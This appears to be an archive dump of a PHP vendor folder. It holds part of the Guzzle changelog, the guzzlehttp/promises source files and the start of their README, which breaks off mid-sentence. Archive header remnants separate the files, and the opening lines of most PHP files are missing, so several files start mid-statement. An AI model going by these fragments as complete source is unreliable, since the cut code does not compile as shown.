pass a smaller timeout to CurlMulti::executeHandles ## 2.8.2 - 2012-07-24 * Bug: Query string values set to 0 are no longer dropped from the query string * Bug: A Collection object is no longer created each time a call is made to `Guzzle\Service\Command\AbstractCommand::getRequestHeaders()` * Bug: `+` is now treated as an encoded space when parsing query strings * QueryString and Collection performance improvements * Allowing dot notation for class paths in filters attribute of a service descriptions ## 2.8.1 - 2012-07-16 * Loosening Event Dispatcher dependency * POST redirects can now be customized using CURLOPT_POSTREDIR ## 2.8.0 - 2012-07-15 * BC: Guzzle\Http\Query * Query strings with empty variables will always show an equal sign unless the variable is set to QueryString::BLANK (e.g. ?acl= vs ?acl) * Changed isEncodingValues() and isEncodingFields() to isUrlEncoding() * Changed setEncodeValues(bool) and setEncodeFields(bool) to useUrlEncoding(bool) * Changed the aggregation functions of QueryString to be static methods * Can now use fromString() with querystrings that have a leading ? * cURL configuration values can be specified in service descriptions using `curl.` prefixed parameters * Content-Length is set to 0 before emitting the request.before_send event when sending an empty request body * Cookies are no longer URL decoded by default * Bug: URI template variables set to null are no longer expanded ## 2.7.2 - 2012-07-02 * BC: Moving things to get ready for subtree splits. Moving Inflection into Common. Moving Guzzle\Http\Parser to Guzzle\Parser. * BC: Removing Guzzle\Common\Batch\Batch::count() and replacing it with isEmpty() * CachePlugin now allows for a custom request parameter function to check if a request can be cached * Bug fix: CachePlugin now only caches GET and HEAD requests by default * Bug fix: Using header glue when transferring headers over the wire * Allowing deeply nested arrays for composite variables in URI templates * Batch divisors can now return iterators or arrays ## 2.7.1 - 2012-06-26 * Minor patch to update version number in UA string * Updating build process ## 2.7.0 - 2012-06-25 * BC: Inflection classes moved to Guzzle\Inflection. No longer static methods. Can now inject custom inflectors into classes. * BC: Removed magic setX methods from commands * BC: Magic methods mapped to service description commands are now inflected in the command factory rather than the client __call() method * Verbose cURL options are no longer enabled by default. Set curl.debug to true on a client to enable. * Bug: Now allowing colons in a response start-line (e.g. HTTP/1.1 503 Service Unavailable: Back-end server is at capacity) * Guzzle\Service\Resource\ResourceIteratorApplyBatched now internally uses the Guzzle\Common\Batch namespace * Added Guzzle\Service\Plugin namespace and a PluginCollectionPlugin * Added the ability to set POST fields and files in a service description * Guzzle\Http\EntityBody::factory() now accepts objects with a __toString() method * Adding a command.before_prepare event to clients * Added BatchClosureTransfer and BatchClosureDivisor * BatchTransferException now includes references to the batch divisor and transfer strategies * Fixed some tests so that they pass more reliably * Added Guzzle\Common\Log\ArrayLogAdapter ## 2.6.6 - 2012-06-10 * BC: Removing Guzzle\Http\Plugin\BatchQueuePlugin * BC: Removing Guzzle\Service\Command\CommandSet * Adding generic batching system (replaces the batch queue plugin and command set) * Updating ZF cache and log adapters and now using ZF's composer repository * Bug: Setting the name of each ApiParam when creating through an ApiCommand * Adding result_type, result_doc, deprecated, and doc_url to service descriptions * Bug: Changed the default cookie header casing back to 'Cookie' ## 2.6.5 - 2012-06-03 * BC: Renaming Guzzle\Http\Message\RequestInterface::getResourceUri() to getResource() * BC: Removing unused AUTH_BASIC and AUTH_DIGEST constants from * BC: Guzzle\Http\Cookie is now used to manage Set-Cookie data, not Cookie data * BC: Renaming methods in the CookieJarInterface * Moving almost all cookie logic out of the CookiePlugin and into the Cookie or CookieJar implementations * Making the default glue for HTTP headers ';' instead of ',' * Adding a removeValue to Guzzle\Http\Message\Header * Adding getCookies() to request interface. * Making it easier to add event subscribers to HasDispatcherInterface classes. Can now directly call addSubscriber() ## 2.6.4 - 2012-05-30 * BC: Cleaning up how POST files are stored in EntityEnclosingRequest objects. Adding PostFile class. * BC: Moving ApiCommand specific functionality from the Inspector and on to the ApiCommand * Bug: Fixing magic method command calls on clients * Bug: Email constraint only validates strings * Bug: Aggregate POST fields when POST files are present in curl handle * Bug: Fixing default User-Agent header * Bug: Only appending or prepending parameters in commands if they are specified * Bug: Not requiring response reason phrases or status codes to match a predefined list of codes * Allowing the use of dot notation for class namespaces when using instance_of constraint * Added any_match validation constraint * Added an AsyncPlugin * Passing request object to the calculateWait method of the ExponentialBackoffPlugin * Allowing the result of a command object to be changed * Parsing location and type sub values when instantiating a service description rather than over and over at runtime ## 2.6.3 - 2012-05-23 * [BC] Guzzle\Common\FromConfigInterface no longer requires any config options. * [BC] Refactoring how POST files are stored on an EntityEnclosingRequest. They are now separate from POST fields. * You can now use an array of data when creating PUT request bodies in the request factory. * Removing the requirement that HTTPS requests needed a Cache-Control: public directive to be cacheable. * [Http] Adding support for Content-Type in multipart POST uploads per upload * [Http] Added support for uploading multiple files using the same name (foo[0], foo[1]) * Adding more POST data operations for easier manipulation of POST data. * You can now set empty POST fields. * The body of a request is only shown on EntityEnclosingRequest objects that do not use POST files. * Split the Guzzle\Service\Inspector::validateConfig method into two methods. One to initialize when a command is created, and one to validate. * CS updates ## 2.6.2 - 2012-05-19 * [Http] Better handling of nested scope requests in CurlMulti. Requests are now always prepares in the send() method rather than the addRequest() method. ## 2.6.1 - 2012-05-19 * [BC] Removing 'path' support in service descriptions. Use 'uri'. * [BC] Guzzle\Service\Inspector::parseDocBlock is now protected. Adding getApiParamsForClass() with cache. * [BC] Removing Guzzle\Common\NullObject. Use https://github.com/mtdowling/NullObject if you need it. * [BC] Removing Guzzle\Common\XmlElement. * All commands, both dynamic and concrete, have ApiCommand objects. * Adding a fix for CurlMulti so that if all of the connections encounter some sort of curl error, then the loop exits. * Adding checks to EntityEnclosingRequest so that empty POST files and fields are ignored. * Making the method signature of Guzzle\Service\Builder\ServiceBuilder::factory more flexible. ## 2.6.0 - 2012-05-15 * [BC] Moving Guzzle\Service\Builder to Guzzle\Service\Builder\ServiceBuilder * [BC] Executing a Command returns the result of the command rather than the command * [BC] Moving all HTTP parsing logic to Guzzle\Http\Parsers. Allows for faster C implementations if needed. * [BC] Changing the Guzzle\Http\Message\Response::setProtocol() method to accept a protocol and version in separate args. * [BC] Moving ResourceIterator* to Guzzle\Service\Resource * [BC] Completely refactored ResourceIterators to iterate over a cloned command object * [BC] Moved Guzzle\Http\UriTemplate to Guzzle\Http\Parser\UriTemplate\UriTemplate * [BC] Guzzle\Guzzle is now deprecated * Moving Guzzle\Common\Guzzle::inject to Guzzle\Common\Collection::inject * Adding Guzzle\Version class to give version information about Guzzle * Adding Guzzle\Http\Utils class to provide getDefaultUserAgent() and getHttpDate() * Adding Guzzle\Curl\CurlVersion to manage caching curl_version() data * ServiceDescription and ServiceBuilder are now cacheable using similar configs * Changing the format of XML and JSON service builder configs. Backwards compatible. * Cleaned up Cookie parsing * Trimming the default Guzzle User-Agent header * Adding a setOnComplete() method to Commands that is called when a command completes * Keeping track of requests that were mocked in the MockPlugin * Fixed a caching bug in the CacheAdapterFactory * Inspector objects can be injected into a Command object * Refactoring a lot of code and tests to be case insensitive when dealing with headers * Adding Guzzle\Http\Message\HeaderComparison for easy comparison of HTTP headers using a DSL * Adding the ability to set global option overrides to service builder configs * Adding the ability to include other service builder config files from within XML and JSON files * Moving the parseQuery method out of Url and on to QueryString::fromString() as a static factory method. ## 2.5.0 - 2012-05-08 * Major performance improvements * [BC] Simplifying Guzzle\Common\Collection. Please check to see if you are using features that are now deprecated. * [BC] Using a custom validation system that allows a flyweight implementation for much faster validation. No longer using Symfony2 Validation component. * [BC] No longer supporting "{{ }}" for injecting into command or UriTemplates. Use "{}" * Added the ability to passed parameters to all requests created by a client * Added callback functionality to the ExponentialBackoffPlugin * Using microtime in ExponentialBackoffPlugin to allow more granular backoff strategies. * Rewinding request stream bodies when retrying requests * Exception is thrown when JSON response body cannot be decoded * Added configurable magic method calls to clients and commands. This is off by default. * Fixed a defect that added a hash to every parsed URL part * Fixed duplicate none generation for OauthPlugin. * Emitting an event each time a client is generated by a ServiceBuilder * Using an ApiParams object instead of a Collection for parameters of an ApiCommand * cache.* request parameters should be renamed to params.cache.* * Added the ability to set arbitrary curl options on requests (disable_wire, progress, etc.). See CurlHandle. * Added the ability to disable type validation of service descriptions * ServiceDescriptions and ServiceBuilders are now Serializable google-api/vendor/guzzlehttp/promises/src/AggregateException.php000064400000000635147600400120021210 0ustar00 * while ($eventLoop->isRunning()) { * GuzzleHttp\Promise\Utils::queue()->run(); * } * * * @param TaskQueueInterface|null $assign Optionally specify a new queue instance. */ public static function queue(TaskQueueInterface $assign = null): TaskQueueInterface { static $queue; if ($assign) { $queue = $assign; } elseif (!$queue) { $queue = new TaskQueue(); } return $queue; } /** * Adds a function to run in the task queue when it is next `run()` and * returns a promise that is fulfilled or rejected with the result. * * @param callable $task Task function to run. */ public static function task(callable $task): PromiseInterface { $queue = self::queue(); $promise = new Promise([$queue, 'run']); $queue->add(function () use ($task, $promise): void { try { if (Is::pending($promise)) { $promise->resolve($task()); } } catch (\Throwable $e) { $promise->reject($e); } }); return $promise; } /** * Synchronously waits on a promise to resolve and returns an inspection * state array. * * Returns a state associative array containing a "state" key mapping to a * valid promise state. If the state of the promise is "fulfilled", the * array will contain a "value" key mapping to the fulfilled value of the * promise. If the promise is rejected, the array will contain a "reason" * key mapping to the rejection reason of the promise. * * @param PromiseInterface $promise Promise or value. */ public static function inspect(PromiseInterface $promise): array { try { return [ 'state' => PromiseInterface::FULFILLED, 'value' => $promise->wait(), ]; } catch (RejectionException $e) { return ['state' => PromiseInterface::REJECTED, 'reason' => $e->getReason()]; } catch (\Throwable $e) { return ['state' => PromiseInterface::REJECTED, 'reason' => $e]; } } /** * Waits on all of the provided promises, but does not unwrap rejected * promises as thrown exception. * * Returns an array of inspection state arrays. * * @see inspect for the inspection state array format. * * @param PromiseInterface[] $promises Traversable of promises to wait upon. */ public static function inspectAll($promises): array { $results = []; foreach ($promises as $key => $promise) { $results[$key] = self::inspect($promise); } return $results; } /** * Waits on all of the provided promises and returns the fulfilled values. * * Returns an array that contains the value of each promise (in the same * order the promises were provided). An exception is thrown if any of the * promises are rejected. * * @param iterable $promises Iterable of PromiseInterface objects to wait on. * * @throws \Throwable on error */ public static function unwrap($promises): array { $results = []; foreach ($promises as $key => $promise) { $results[$key] = $promise->wait(); } return $results; } /** * Given an array of promises, return a promise that is fulfilled when all * the items in the array are fulfilled. * * The promise's fulfillment value is an array with fulfillment values at * respective positions to the original array. If any promise in the array * rejects, the returned promise is rejected with the rejection reason. * * @param mixed $promises Promises or values. * @param bool $recursive If true, resolves new promises that might have been added to the stack during its own resolution. */ public static function all($promises, bool $recursive = false): PromiseInterface { $results = []; $promise = Each::of( $promises, function ($value, $idx) use (&$results): void { $results[$idx] = $value; }, function ($reason, $idx, Promise $aggregate): void { $aggregate->reject($reason); } )->then(function () use (&$results) { ksort($results); return $results; }); if (true === $recursive) { $promise = $promise->then(function ($results) use ($recursive, &$promises) { foreach ($promises as $promise) { if (Is::pending($promise)) { return self::all($promises, $recursive); } } return $results; }); } return $promise; } /** * Initiate a competitive race between multiple promises or values (values * will become immediately fulfilled promises). * * When count amount of promises have been fulfilled, the returned promise * is fulfilled with an array that contains the fulfillment values of the * winners in order of resolution. * * This promise is rejected with a {@see AggregateException} if the number * of fulfilled promises is less than the desired $count. * * @param int $count Total number of promises. * @param mixed $promises Promises or values. */ public static function some(int $count, $promises): PromiseInterface { $results = []; $rejections = []; return Each::of( $promises, function ($value, $idx, PromiseInterface $p) use (&$results, $count): void { if (Is::settled($p)) { return; } $results[$idx] = $value; if (count($results) >= $count) { $p->resolve(null); } }, function ($reason) use (&$rejections): void { $rejections[] = $reason; } )->then( function () use (&$results, &$rejections, $count) { if (count($results) !== $count) { throw new AggregateException( 'Not enough promises to fulfill count', $rejections ); } ksort($results); return array_values($results); } ); } /** * Like some(), with 1 as count. However, if the promise fulfills, the * fulfillment value is not an array of 1 but the value directly. * * @param mixed $promises Promises or values. */ public static function any($promises): PromiseInterface { return self::some(1, $promises)->then(function ($values) { return $values[0]; }); } /** * Returns a promise that is fulfilled when all of the provided promises have * been fulfilled or rejected. * * The returned promise is fulfilled with an array of inspection state arrays. * * @see inspect for the inspection state array format. * * @param mixed $promises Promises or values. */ public static function settle($promises): PromiseInterface { $results = []; return Each::of( $promises, function ($value, $idx) use (&$results): void { $results[$idx] = ['state' => PromiseInterface::FULFILLED, 'value' => $value]; }, function ($reason, $idx) use (&$results): void { $results[$idx] = ['state' => PromiseInterface::REJECTED, 'reason' => $reason]; } )->then(function () use (&$results) { ksort($results); return $results; }); } } google-api/vendor/guzzlehttp/promises/src/Is.php000064400000001655147600400120016021 0ustar00getState() === PromiseInterface::PENDING; } /** * Returns true if a promise is fulfilled or rejected. */ public static function settled(PromiseInterface $promise): bool { return $promise->getState() !== PromiseInterface::PENDING; } /** * Returns true if a promise is fulfilled. */ public static function fulfilled(PromiseInterface $promise): bool { return $promise->getState() === PromiseInterface::FULFILLED; } /** * Returns true if a promise is rejected. */ public static function rejected(PromiseInterface $promise): bool { return $promise->getState() === PromiseInterface::REJECTED; } } google-api/vendor/guzzlehttp/promises/src/RejectionException.php000064400000002330147600400120021236 0ustar00reason = $reason; $message = 'The promise was rejected'; if ($description) { $message .= ' with reason: '.$description; } elseif (is_string($reason) || (is_object($reason) && method_exists($reason, '__toString')) ) { $message .= ' with reason: '.$this->reason; } elseif ($reason instanceof \JsonSerializable) { $message .= ' with reason: '.json_encode($this->reason, JSON_PRETTY_PRINT); } parent::__construct($message); } /** * Returns the rejection reason. * * @return mixed */ public function getReason() { return $this->reason; } } google-api/vendor/guzzlehttp/promises/src/PromisorInterface.php000064400000000371147600400120021073 0ustar00run(); * * @final */ class TaskQueue implements TaskQueueInterface { private $enableShutdown = true; private $queue = []; public function __construct(bool $withShutdown = true) { if ($withShutdown) { register_shutdown_function(function (): void { if ($this->enableShutdown) { // Only run the tasks if an E_ERROR didn't occur. $err = error_get_last(); if (!$err || ($err['type'] ^ E_ERROR)) { $this->run(); } } }); } } public function isEmpty(): bool { return !$this->queue; } public function add(callable $task): void { $this->queue[] = $task; } public function run(): void { while ($task = array_shift($this->queue)) { /** @var callable $task */ $task(); } } /** * The task queue will be run and exhausted by default when the process * exits IFF the exit is not the result of a PHP E_ERROR error. * * You can disable running the automatic shutdown of the queue by calling * this function. If you disable the task queue shutdown process, then you * MUST either run the task queue (as a result of running your event loop * or manually using the run() method) or wait on each outstanding promise. * * Note: This shutdown will occur before any destructors are triggered. */ public function disableShutdown(): void { $this->enableShutdown = false; } } google-api/vendor/guzzlehttp/promises/src/PromiseInterface.php000064400000005407147600400120020704 0ustar00then([$promise, 'resolve'], [$promise, 'reject']); return $promise; } return new FulfilledPromise($value); } /** * Creates a rejected promise for a reason if the reason is not a promise. * If the provided reason is a promise, then it is returned as-is. * * @param mixed $reason Promise or reason. */ public static function rejectionFor($reason): PromiseInterface { if ($reason instanceof PromiseInterface) { return $reason; } return new RejectedPromise($reason); } /** * Create an exception for a rejected promise value. * * @param mixed $reason */ public static function exceptionFor($reason): \Throwable { if ($reason instanceof \Throwable) { return $reason; } return new RejectionException($reason); } /** * Returns an iterator for the given value. * * @param mixed $value */ public static function iterFor($value): \Iterator { if ($value instanceof \Iterator) { return $value; } if (is_array($value)) { return new \ArrayIterator($value); } return new \ArrayIterator([$value]); } } google-api/vendor/guzzlehttp/promises/src/Each.php000064400000005143147600400120016302 0ustar00 $onFulfilled, 'rejected' => $onRejected, ]))->promise(); } /** * Like of, but only allows a certain number of outstanding promises at any * given time. * * $concurrency may be an integer or a function that accepts the number of * pending promises and returns a numeric concurrency limit value to allow * for dynamic a concurrency size. * * @param mixed $iterable * @param int|callable $concurrency */ public static function ofLimit( $iterable, $concurrency, callable $onFulfilled = null, callable $onRejected = null ): PromiseInterface { return (new EachPromise($iterable, [ 'fulfilled' => $onFulfilled, 'rejected' => $onRejected, 'concurrency' => $concurrency, ]))->promise(); } /** * Like limit, but ensures that no promise in the given $iterable argument * is rejected. If any promise is rejected, then the aggregate promise is * rejected with the encountered rejection. * * @param mixed $iterable * @param int|callable $concurrency */ public static function ofLimitAll( $iterable, $concurrency, callable $onFulfilled = null ): PromiseInterface { return self::ofLimit( $iterable, $concurrency, $onFulfilled, function ($reason, $idx, PromiseInterface $aggregate): void { $aggregate->reject($reason); } ); } } google-api/vendor/guzzlehttp/promises/src/RejectedPromise.php000064400000004332147600400120020525 0ustar00reason = $reason; } public function then( callable $onFulfilled = null, callable $onRejected = null ): PromiseInterface { // If there's no onRejected callback then just return self. if (!$onRejected) { return $this; } $queue = Utils::queue(); $reason = $this->reason; $p = new Promise([$queue, 'run']); $queue->add(static function () use ($p, $reason, $onRejected): void { if (Is::pending($p)) { try { // Return a resolved promise if onRejected does not throw. $p->resolve($onRejected($reason)); } catch (\Throwable $e) { // onRejected threw, so return a rejected promise. $p->reject($e); } } }); return $p; } public function otherwise(callable $onRejected): PromiseInterface { return $this->then(null, $onRejected); } public function wait(bool $unwrap = true) { if ($unwrap) { throw Create::exceptionFor($this->reason); } return null; } public function getState(): string { return self::REJECTED; } public function resolve($value): void { throw new \LogicException('Cannot resolve a rejected promise'); } public function reject($reason): void { if ($reason !== $this->reason) { throw new \LogicException('Cannot reject a rejected promise'); } } public function cancel(): void { // pass } } google-api/vendor/guzzlehttp/promises/src/FulfilledPromise.php000064400000003773147600400120020716 0ustar00value = $value; } public function then( callable $onFulfilled = null, callable $onRejected = null ): PromiseInterface { // Return itself if there is no onFulfilled function. if (!$onFulfilled) { return $this; } $queue = Utils::queue(); $p = new Promise([$queue, 'run']); $value = $this->value; $queue->add(static function () use ($p, $value, $onFulfilled): void { if (Is::pending($p)) { try { $p->resolve($onFulfilled($value)); } catch (\Throwable $e) { $p->reject($e); } } }); return $p; } public function otherwise(callable $onRejected): PromiseInterface { return $this->then(null, $onRejected); } public function wait(bool $unwrap = true) { return $unwrap ? $this->value : null; } public function getState(): string { return self::FULFILLED; } public function resolve($value): void { if ($value !== $this->value) { throw new \LogicException('Cannot resolve a fulfilled promise'); } } public function reject($reason): void { throw new \LogicException('Cannot reject a fulfilled promise'); } public function cancel(): void { // pass } } google-api/vendor/guzzlehttp/promises/src/Promise.php000064400000021375147600400120017065 0ustar00waitFn = $waitFn; $this->cancelFn = $cancelFn; } public function then( callable $onFulfilled = null, callable $onRejected = null ): PromiseInterface { if ($this->state === self::PENDING) { $p = new Promise(null, [$this, 'cancel']); $this->handlers[] = [$p, $onFulfilled, $onRejected]; $p->waitList = $this->waitList; $p->waitList[] = $this; return $p; } // Return a fulfilled promise and immediately invoke any callbacks. if ($this->state === self::FULFILLED) { $promise = Create::promiseFor($this->result); return $onFulfilled ? $promise->then($onFulfilled) : $promise; } // It's either cancelled or rejected, so return a rejected promise // and immediately invoke any callbacks. $rejection = Create::rejectionFor($this->result); return $onRejected ? $rejection->then(null, $onRejected) : $rejection; } public function otherwise(callable $onRejected): PromiseInterface { return $this->then(null, $onRejected); } public function wait(bool $unwrap = true) { $this->waitIfPending(); if ($this->result instanceof PromiseInterface) { return $this->result->wait($unwrap); } if ($unwrap) { if ($this->state === self::FULFILLED) { return $this->result; } // It's rejected so "unwrap" and throw an exception. throw Create::exceptionFor($this->result); } } public function getState(): string { return $this->state; } public function cancel(): void { if ($this->state !== self::PENDING) { return; } $this->waitFn = $this->waitList = null; if ($this->cancelFn) { $fn = $this->cancelFn; $this->cancelFn = null; try { $fn(); } catch (\Throwable $e) { $this->reject($e); } } // Reject the promise only if it wasn't rejected in a then callback. /** @psalm-suppress RedundantCondition */ if ($this->state === self::PENDING) { $this->reject(new CancellationException('Promise has been cancelled')); } } public function resolve($value): void { $this->settle(self::FULFILLED, $value); } public function reject($reason): void { $this->settle(self::REJECTED, $reason); } private function settle(string $state, $value): void { if ($this->state !== self::PENDING) { // Ignore calls with the same resolution. if ($state === $this->state && $value === $this->result) { return; } throw $this->state === $state ? new \LogicException("The promise is already {$state}.") : new \LogicException("Cannot change a {$this->state} promise to {$state}"); } if ($value === $this) { throw new \LogicException('Cannot fulfill or reject a promise with itself'); } // Clear out the state of the promise but stash the handlers. $this->state = $state; $this->result = $value; $handlers = $this->handlers; $this->handlers = null; $this->waitList = $this->waitFn = null; $this->cancelFn = null; if (!$handlers) { return; } // If the value was not a settled promise or a thenable, then resolve // it in the task queue using the correct ID. if (!is_object($value) || !method_exists($value, 'then')) { $id = $state === self::FULFILLED ? 1 : 2; // It's a success, so resolve the handlers in the queue. Utils::queue()->add(static function () use ($id, $value, $handlers): void { foreach ($handlers as $handler) { self::callHandler($id, $value, $handler); } }); } elseif ($value instanceof Promise && Is::pending($value)) { // We can just merge our handlers onto the next promise. $value->handlers = array_merge($value->handlers, $handlers); } else { // Resolve the handlers when the forwarded promise is resolved. $value->then( static function ($value) use ($handlers): void { foreach ($handlers as $handler) { self::callHandler(1, $value, $handler); } }, static function ($reason) use ($handlers): void { foreach ($handlers as $handler) { self::callHandler(2, $reason, $handler); } } ); } } /** * Call a stack of handlers using a specific callback index and value. * * @param int $index 1 (resolve) or 2 (reject). * @param mixed $value Value to pass to the callback. * @param array $handler Array of handler data (promise and callbacks). */ private static function callHandler(int $index, $value, array $handler): void { /** @var PromiseInterface $promise */ $promise = $handler[0]; // The promise may have been cancelled or resolved before placing // this thunk in the queue. if (Is::settled($promise)) { return; } try { if (isset($handler[$index])) { /* * If $f throws an exception, then $handler will be in the exception * stack trace. Since $handler contains a reference to the callable * itself we get a circular reference. We clear the $handler * here to avoid that memory leak. */ $f = $handler[$index]; unset($handler); $promise->resolve($f($value)); } elseif ($index === 1) { // Forward resolution values as-is. $promise->resolve($value); } else { // Forward rejections down the chain. $promise->reject($value); } } catch (\Throwable $reason) { $promise->reject($reason); } } private function waitIfPending(): void { if ($this->state !== self::PENDING) { return; } elseif ($this->waitFn) { $this->invokeWaitFn(); } elseif ($this->waitList) { $this->invokeWaitList(); } else { // If there's no wait function, then reject the promise. $this->reject('Cannot wait on a promise that has ' .'no internal wait function. You must provide a wait ' .'function when constructing the promise to be able to ' .'wait on a promise.'); } Utils::queue()->run(); /** @psalm-suppress RedundantCondition */ if ($this->state === self::PENDING) { $this->reject('Invoking the wait callback did not resolve the promise'); } } private function invokeWaitFn(): void { try { $wfn = $this->waitFn; $this->waitFn = null; $wfn(true); } catch (\Throwable $reason) { if ($this->state === self::PENDING) { // The promise has not been resolved yet, so reject the promise // with the exception. $this->reject($reason); } else { // The promise was already resolved, so there's a problem in // the application. throw $reason; } } } private function invokeWaitList(): void { $waitList = $this->waitList; $this->waitList = null; foreach ($waitList as $result) { do { $result->waitIfPending(); $result = $result->result; } while ($result instanceof Promise); if ($result instanceof PromiseInterface) { $result->wait(false); } } } } google-api/vendor/guzzlehttp/promises/src/CancellationException.php000064400000000321147600400120021706 0ustar00then(function ($v) { echo $v; }); * * @param callable $generatorFn Generator function to wrap into a promise. * * @return Promise * * @see https://github.com/petkaantonov/bluebird/blob/master/API.md#generators inspiration */ final class Coroutine implements PromiseInterface { /** * @var PromiseInterface|null */ private $currentPromise; /** * @var Generator */ private $generator; /** * @var Promise */ private $result; public function __construct(callable $generatorFn) { $this->generator = $generatorFn(); $this->result = new Promise(function (): void { while (isset($this->currentPromise)) { $this->currentPromise->wait(); } }); try { $this->nextCoroutine($this->generator->current()); } catch (Throwable $throwable) { $this->result->reject($throwable); } } /** * Create a new coroutine. */ public static function of(callable $generatorFn): self { return new self($generatorFn); } public function then( callable $onFulfilled = null, callable $onRejected = null ): PromiseInterface { return $this->result->then($onFulfilled, $onRejected); } public function otherwise(callable $onRejected): PromiseInterface { return $this->result->otherwise($onRejected); } public function wait(bool $unwrap = true) { return $this->result->wait($unwrap); } public function getState(): string { return $this->result->getState(); } public function resolve($value): void { $this->result->resolve($value); } public function reject($reason): void { $this->result->reject($reason); } public function cancel(): void { $this->currentPromise->cancel(); $this->result->cancel(); } private function nextCoroutine($yielded): void { $this->currentPromise = Create::promiseFor($yielded) ->then([$this, '_handleSuccess'], [$this, '_handleFailure']); } /** * @internal */ public function _handleSuccess($value): void { unset($this->currentPromise); try { $next = $this->generator->send($value); if ($this->generator->valid()) { $this->nextCoroutine($next); } else { $this->result->resolve($value); } } catch (Throwable $throwable) { $this->result->reject($throwable); } } /** * @internal */ public function _handleFailure($reason): void { unset($this->currentPromise); try { $nextYield = $this->generator->throw(Create::exceptionFor($reason)); // The throw was caught, so keep iterating on the coroutine $this->nextCoroutine($nextYield); } catch (Throwable $throwable) { $this->result->reject($throwable); } } } google-api/vendor/guzzlehttp/promises/src/EachPromise.php000064400000016651147600400120017647 0ustar00iterable = Create::iterFor($iterable); if (isset($config['concurrency'])) { $this->concurrency = $config['concurrency']; } if (isset($config['fulfilled'])) { $this->onFulfilled = $config['fulfilled']; } if (isset($config['rejected'])) { $this->onRejected = $config['rejected']; } } /** @psalm-suppress InvalidNullableReturnType */ public function promise(): PromiseInterface { if ($this->aggregate) { return $this->aggregate; } try { $this->createPromise(); /** @psalm-assert Promise $this->aggregate */ $this->iterable->rewind(); $this->refillPending(); } catch (\Throwable $e) { $this->aggregate->reject($e); } /** * @psalm-suppress NullableReturnStatement */ return $this->aggregate; } private function createPromise(): void { $this->mutex = false; $this->aggregate = new Promise(function (): void { if ($this->checkIfFinished()) { return; } reset($this->pending); // Consume a potentially fluctuating list of promises while // ensuring that indexes are maintained (precluding array_shift). while ($promise = current($this->pending)) { next($this->pending); $promise->wait(); if (Is::settled($this->aggregate)) { return; } } }); // Clear the references when the promise is resolved. $clearFn = function (): void { $this->iterable = $this->concurrency = $this->pending = null; $this->onFulfilled = $this->onRejected = null; $this->nextPendingIndex = 0; }; $this->aggregate->then($clearFn, $clearFn); } private function refillPending(): void { if (!$this->concurrency) { // Add all pending promises. while ($this->addPending() && $this->advanceIterator()) { } return; } // Add only up to N pending promises. $concurrency = is_callable($this->concurrency) ? ($this->concurrency)(count($this->pending)) : $this->concurrency; $concurrency = max($concurrency - count($this->pending), 0); // Concurrency may be set to 0 to disallow new promises. if (!$concurrency) { return; } // Add the first pending promise. $this->addPending(); // Note this is special handling for concurrency=1 so that we do // not advance the iterator after adding the first promise. This // helps work around issues with generators that might not have the // next value to yield until promise callbacks are called. while (--$concurrency && $this->advanceIterator() && $this->addPending()) { } } private function addPending(): bool { if (!$this->iterable || !$this->iterable->valid()) { return false; } $promise = Create::promiseFor($this->iterable->current()); $key = $this->iterable->key(); // Iterable keys may not be unique, so we use a counter to // guarantee uniqueness $idx = $this->nextPendingIndex++; $this->pending[$idx] = $promise->then( function ($value) use ($idx, $key): void { if ($this->onFulfilled) { ($this->onFulfilled)( $value, $key, $this->aggregate ); } $this->step($idx); }, function ($reason) use ($idx, $key): void { if ($this->onRejected) { ($this->onRejected)( $reason, $key, $this->aggregate ); } $this->step($idx); } ); return true; } private function advanceIterator(): bool { // Place a lock on the iterator so that we ensure to not recurse, // preventing fatal generator errors. if ($this->mutex) { return false; } $this->mutex = true; try { $this->iterable->next(); $this->mutex = false; return true; } catch (\Throwable $e) { $this->aggregate->reject($e); $this->mutex = false; return false; } } private function step(int $idx): void { // If the promise was already resolved, then ignore this step. if (Is::settled($this->aggregate)) { return; } unset($this->pending[$idx]); // Only refill pending promises if we are not locked, preventing the // EachPromise to recursively invoke the provided iterator, which // cause a fatal error: "Cannot resume an already running generator" if ($this->advanceIterator() && !$this->checkIfFinished()) { // Add more pending promises if possible. $this->refillPending(); } } private function checkIfFinished(): bool { if (!$this->pending && !$this->iterable->valid()) { // Resolve the promise if there's nothing left to do. $this->aggregate->resolve(null); return true; } return false; } } google-api/vendor/guzzlehttp/promises/README.md000064400000042362147600400120015425 0ustar00# Guzzle Promises [Promises/A+](https://promisesaplus.com/) implementation that handles promise chaining and resolution iteratively, allowing for "infinite" promise chaining while keeping the stack size constant. Read [this blog post](https://blog.domenic.me/youre-missing-the-point-of-promises/) for a general introduction to promises. - [Features](#features) - [Quick start](#quick-start) - [Synchronous wait](#synchronous-wait) - [Cancellation](#cancellation) - [API](#api) - [Promise](#promise) - [FulfilledPromise](#fulfilledpromise) - [RejectedPromise](#rejectedpromise) - [Promise interop](#promise-interop) - [Implementation notes](#implementation-notes) ## Features - [Promises/A+](https://promisesaplus.com/) implementation. - Promise resolution and chaining is handled iteratively, allowing for "infinite" promise chaining. - Promises have a synchronous `wait` method. - Promises can be cancelled. - Works with any object that has a `then` function. - C# style async/await coroutine promises using `GuzzleHttp\Promise\Coroutine::of()`. ## Installation ```shell composer require guzzlehttp/promises ``` ## Version Guidance | Version | Status | PHP Version | |---------|------------------------|--------------| | 1.x | Bug and security fixes | >=5.5,<8.3 | | 2.x | Latest | >=7.2.5,<8.4 | ## Quick Start A *promise* represents the eventual result of an asynchronous operation. The primary way of interacting with a promise is through its `then` method, which registers callbacks to receive either a promise's eventual value or the reason why the promise cannot be fulfilled. ### Callbacks Callbacks are registered with the `then` method by providing an optional `$onFulfilled` followed by an optional `$onRejected` function. ```php use GuzzleHttp\Promise\Promise; $promise = new Promise(); $promise->then( // $onFulfilled function ($value) { echo 'The promise was fulfilled.'; }, // $onRejected function ($reason) { echo 'The promise was rejected.'; } ); ``` *Resolving* a promise means that you either fulfill a promise with a *value* or reject a promise with a *reason*. Resolving a promise triggers callbacks registered with the promise's `then` method. These callbacks are triggered only once and in the order in which they were added. ### Resolving a Promise Promises are fulfilled using the `resolve($value)` method. Resolving a promise with any value other than a `GuzzleHttp\Promise\RejectedPromise` will trigger all of the onFulfilled callbacks (resolving a promise with a rejected promise will reject the promise and trigger the `$onRejected` callbacks). ```php use GuzzleHttp\Promise\Promise; $promise = new Promise(); $promise ->then(function ($value) { // Return a value and don't break the chain return "Hello, " . $value; }) // This then is executed after the first then and receives the value // returned from the first then. ->then(function ($value) { echo $value; }); // Resolving the promise triggers the $onFulfilled callbacks and outputs // "Hello, reader." $promise->resolve('reader.'); ``` ### Promise Forwarding Promises can be chained one after the other. Each then in the chain is a new promise. The return value of a promise is what's forwarded to the next promise in the 